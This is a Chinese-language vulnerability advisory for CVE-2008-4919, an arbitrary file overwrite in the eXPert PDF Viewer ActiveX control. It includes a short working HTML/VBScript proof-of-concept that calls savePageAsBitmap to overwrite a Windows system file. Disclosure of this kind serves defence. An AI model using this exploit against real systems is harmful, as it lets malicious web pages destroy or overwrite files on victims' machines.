发布日期：2008-10-29
更新日期：2008-10-30

受影响系统：

Visagesoft eXPert PDF Viewer ActiveX 3.0.990.0

描述：

---

BUGTRAQ  ID: 31984
CVE(CAN) ID: CVE-2008-4919

eXPert PDF Viewer是为windows应用开发人员设计的可嵌入式PDF查看器。

eXPert PDF Viewer ActiveX控件的savePageAsBitmap方式没有正确地验证bitmapFileName输入参数，如果用户受骗访问了恶意网页并向该方式传送了恶意参数的话，就可能导致向系统上保存并覆盖任意文件。

<*来源：Marco Torti （marcotorti2@yahoo.com）
  
  链接：http://www.milw0rm.com/exploits/6875
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<object classid='clsid:BDF3E9D2-5F7A-4F4A-A914-7498C862EA6A' id='target'/></object>
<input language=VBScript onclick=launch() type=button value='start exploit'>
<script language='vbscript'>
Sub launch
target.savePageAsBitmap "c:\windows\-system.ini"
MsgBox"Exploit Completed.. file overwrite!"
End Sub
</script>

建议：

---

厂商补丁：

Visagesoft
----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.visagesoft.com/products/pdfviewerx/

浏览次数：2491
严重程度：0（网友投票）